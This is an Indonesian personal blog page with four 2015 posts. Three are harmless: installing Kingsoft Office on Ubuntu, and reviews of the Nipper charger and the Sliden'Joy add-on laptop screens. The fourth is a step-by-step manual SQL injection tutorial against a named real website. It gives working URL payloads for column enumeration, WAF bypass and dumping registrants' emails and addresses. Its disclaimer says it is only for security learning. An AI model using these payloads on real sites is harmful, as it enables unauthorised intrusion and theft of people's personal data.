Saturday, August 29, 2015

Assalamu'alaikum Wr Wb
BismillahHirahmanirrahiim

Setelah beberapa Minggu saya gk sempet nulis di Blog ini sekarang saya sempatkan menulis lagi dengan Judul Cara Install Kingsoft di Linux Ubuntu 64 bit


ok udah pada tau kan Kingsoft, sedikit info bagi yg belum tau, Kingsoft merupakan Software seperti Microsoft Office namun Kingsoft ini gratis dan tersedia untuk linux

Jadi bagi pengguna Linux Kingsoft ini merupakan pengganti bagi Microsoft. Kingsoft ini memiliki design yg hampir sama dengan Microsoft sehingga cukup friendly untuk digunakan

Ok langsung saja Kita lanjut ke Tutorial kali ini

1. Anda bisa langsung download file masternya dari Website resminya Disini
2. Pilih versi terbaru yg berekstensi *.deb
3. Taruh file tadi ke home
4. masuk terminal dan ketikkan command
sudo dpkg -i namafiletadi.deb
5. Tunggu sampai selesai, Jika sudah selesai masukkan perintah
apt-get -f install

6. Jika diminta persetujuan ketik saja Y lalu enter
7. tunggu sampai selesai dan Selamat menggunakan Kingsoft

nb: jika masih terjadi error saat telah diupdate, bisa buka Ubuntu Software Center, nantinya akan diperbaiki disana :)

Berikut Screenshootnya :

 

 

Terimakasih
Wassalamu'alaikum Wr Wb
Alhamdulillah




0

Wednesday, August 12, 2015

Assalamu'alaikum Wr Wb

hahaha, kembali lagi setelah beberapa minggu gk nulis, Ok kali ini gw akan share yg namanya Nipper Charger, Nipper Charger ini ya semacam power bank gitulah broo,



Yoo, mungkin Powerbank sangat membantu anda untuk mengisi baterai handphone saat bepergian, Namun, apa jadinya jika baterai HP dan Powerbank habis, Hahaha, Mokad dah, oleh karena itu inilah kegunaan Nipper Charger yg membutuhkan baterai kecil AA seperti baterai Remote anda



Nipper merupakan Charger terkecil untuk saat ini, untuk saat ini ya gan, entah satu atau dua tahun kedepan, hahaha. Nipper ini dikembangkan oleh dua developer yaitu Chris Tait dan Doug Stokes. Mereka mengembangkan Charger kecil dnegan sumber daya baterai AA.



Nipper ini memiliki port mini USB yg suport untuk Android gan, Charger ini bisa menjadi gantungan kunci saat tidak digunakan karena bentuknya yg kecil, Nipper charger ini mungkin berguna saat membutuhkan daya untuk SMS atau Telefon darurat, karena hanya dapat mengisi 10% selama 30 menit, yaa semua itu karena sumber dayanya yg hanya baterai AA. Semua itu ya ada kekurangannya lah gan



Hahaha, namun buat pengguna Iphone Nipper Charger ini belum compatible dengan ponsel anda gan, Jadi sabar aja ya nunggunya karena developernya sedang mengembangkan agar pengguna Iphone bisa menikmatinya


hahahah, thx waktu bacanya ya gan, Sekian dari saya
Wassalamu'alaikum Wr Wb

0

Monday, August 3, 2015

Ok gan kali ini saya akan memposting tentang tutorial SQLi Manual, ya tentunya namanya manual ya Cuma pake browser ama koneksi inet, hahahaha



Apakah yang dimaksud dengan SQL injection? atau Apakah SQLi/SQL injecttion itu? SQL injection adalah serangan yang memanfaatkan bug/kelemahan/vuln pada website yg mengizinkan attacker untuk memasukkan/input syntax/perintah yg dapat digunakan attacker untuk bisa mengambi; data dari website tersebut. Biasanya Incarannya adalah Admin atau CC/PP pada site tersebut.



Apakah bug SQL berbahaya? Bug SQLi ini merupakan bug yg berbahaya bagi website agan agan semuanya, karena bug ini akan memungkinkan seorang attacker untuk mendapat akses penuh pada website anda dan mengambil data data yg penting dari website anda, atau bisa juga untuk mendeface website anda. Jadi jika di website agan terdapat bug SQLi segeralah untuk menambal bug tersebut

Bagaimana cara attacker melakukan SQL Injection? Ok dibawah ini saya akan mendemonstrasikan bagaimana cara melakukan SQLi manual atau dengan Browser anda

Pertama, carilah website yg memiliki bug pada SQLi, bisa dengan google dorking atau dengan aplikasi auto dork scanner seperti Gr3eNoX. Di tutor saat ini saya memberikan website sebagai demo sekaligus contohnya, yaitu : www.mustangdrive-in.com/history.php?id=49


Sebelum dilanjutkan jangan lah berniat buruk untuk melakukan cyber crime Selalu ingatlah dengan dosa.

Kedua testlah bug tersebut apakah benar benar Vuln dengan memberi syntax � pada akhir websitenya, contohnya seperti ini : www.mustangdrive-in.com/history.php?id=49� jika muncul error seperti gambar dibawah berarti web tersebut benar benar vuln.




Ketiga carilah jumlah column dengan menggunakan syntax +order+by+1--+ sampai anda menemukan error gambar dibawah. Di website ini saya menemukan error pada angka 14 www.mustangdrive-in.com/history.php?id=49+order+by+14--+






Keempat, Jika error pada angka 14 berarti jumlah columnnya adalah 13, karena, jumlah column adalah angka sebelumnya pada error tersebut. Sekarang kita cari angka ajaib untuk menginject web yaitu dengan menambah � sebelum parameter *parameter merupakan angka sesudah =* dan menanmbah  +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+ pada website, contoh www.mustangdrive-in.com/history.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+ dan mencullah angka ajaib seperti dibawah ini



Kelima, masukkan syntax group_concat(table_name,0x3c62723e) pada salah satu dari angka ajaib yg keluar dan tambahkan +from+information_schema.tables+where+table_schema=database()--+ pada akhiran web site tersebut. Contoh : www.mustangdrive-in.com/history.php?id=-49+union+select+1, group_concat(table_name,0x3c62723e),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--+ dan jika terhalang WAF seperti dibawah, maka kita harus melakukan Bypass WAF




Keenam, untuk bypass WAF seperti diatas maka +from+information_schema.tables+where+table_schema=database()--+ kita ganti dengan bypass nya yaitu /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()--+. Contoh : www.mustangdrive-in.com/history.php?id=-49+union+select+1, group_concat(table_name,0x3c62723e),3,4,5,6,7,8,9,10,11,12,13/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()--+. Dan Taraa WAF berhasil kita tembus, maka munculah table table seperti b



Ketujuh, Setelah muncul table maka kita harus membuka table tersebut, cara nya yaitu ganti group_concat(table_name,0x3c62723e) tadi denga group_concat(column_name,0x3c62723e) dan +from+information_schema.tables+where+table_schema=database()--+ dengan +from+information_schema.columns+where+table_name=CHAR()--+ dan rubahlah nama table tersebut dari text biasa menjadi decimal. Untuk menggantinya bisa menggunaka Hashkiller.co.uk. contoh, www.mustangdrive-in.com/history.php?id=-49+union+select+1, group_concat(column_name,0x3c62723e),3,4,5,6,7,8,9,10,11,12,13/*!froM*/ /*!InfORmaTion_scHema*/.cOluMNS /*!WhERe*/ /*!TaBle_NaME*/=CHAR(101, 118, 101, 110, 116, 114, 101, 103, 105, 115, 116, 101, 114)--+ *karena tadi terhalang bypass jadi kita juga harus membuka table dengan bypass juga, dan hasilnya seperti dibawah ini



Kedelapan, setelah mendapat nama columnnya kita tinggal mengambil datanya dengan cara ganti group_concat(column_name,0x3c62723e) denga group_concat(0x3c62723e,id,0x3c62723e,vemail,0x3c62723e,vaddress) isi dalam kurum dengan nama column yg ingin di ambil datanya lalu pisahkan dengan ,0x3c62723e, dan ganti /*!froM*/ /*!InfORmaTion_scHema*/.cOluMNS /*!WhERe*/ /*!TaBle_NaME*/=CHAR(101, 118, 101, 110, 116, 114, 101, 103, 105, 115, 116, 101, 114)--+ tadi dengan +from+nama table tadi--+ contohnya http://www.mustangdrive-in.com/history.php?id=-49+union+select+1,0x3c666f6e7420636f6c6f723d7265643e496e6a656374656420627920416b616e6720537472657373203a3a3c2f666f6e743e,3,4,5,group_concat(0x3c62723e,id,0x3c62723e,vemail,0x3c62723e,vaddress),7,8,9,10,11,12,13+froM+eventregister--+ maka hasilnya seperti dibawah


NB: SEGALA PENYALAHGUNAAN BUKAN MERUPAKAN TANGGUNG JAWAB DARI ADMIN, INI HANYA DIGUNAKAN SEBAGAI PELAJARAN SECURITY SAJA

Ada pertanyaan tanyakan lewat Facebook ini >> Aktivis Terlupakan

Mungkin cukup sekian dari saya, kurang lebihnya mohon maaf. Dan terimakasih atas perhatiannya :D

Alhamdulillah
Wassalamu'alaikum Wr Wb

0

Sunday, August 2, 2015

Asslamu'alaikum Wr Wb
Bismillahirahmanirrahim

Hahaha gan, kali ini gw mau bahas 2 layar eksternal dari Sliden'Joy,



Apasih Sliden'Joy itu? Sliden�Joy, hahaha bagi kalian yg ingin punya laptop dengan memiliki 3 layar inilah jawabannya, Sliden�Joy adalah layar eksternal untuk laptop sehingga Laptop anda bisa memiliki 3 layar, hahaha, Enak nih buat ngegame





Apa sih kegunaan Sliden'Joy? Sliden�Joy memungkinkan anda menambah satu, atau dua layar dengan tampilan full HD dengan layar 15� atau 17� inchi. Jadi kalo buat ngegame bisa resolusi tinggi nih, dan enak jadi lebar, hahaha, dan alat ini cenderung tipis sehingga terlihat berkelas, wiis jadi keren



Lalu, Bagaimana cara menggunakan SLiden'Joy? Untuk memakainya alat ini bisa ditempelkan pada notebook menggunakan magnet di belakang layar. Selanjutnya bisa digeser menjadi dua, dan dihubungkan dengan USB port.




Tapi bagi yg berminat ini belum masuk di pasaran gan. Dan mungkin harganya sekitar $332 US, seharga laptop 4 jutaan nih, hahaha. Nabung dulu gan, hahaha

Ok mungkin segitu yg dapat gw sampein kali ini

Alhamdulillah
Wassalamu'alaikum Wr Wb
0

Author

Subscribe and Follow